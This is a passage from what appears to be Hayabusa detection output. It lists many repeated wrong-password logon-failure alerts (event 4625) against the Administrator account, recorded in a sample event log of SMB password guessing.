NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: 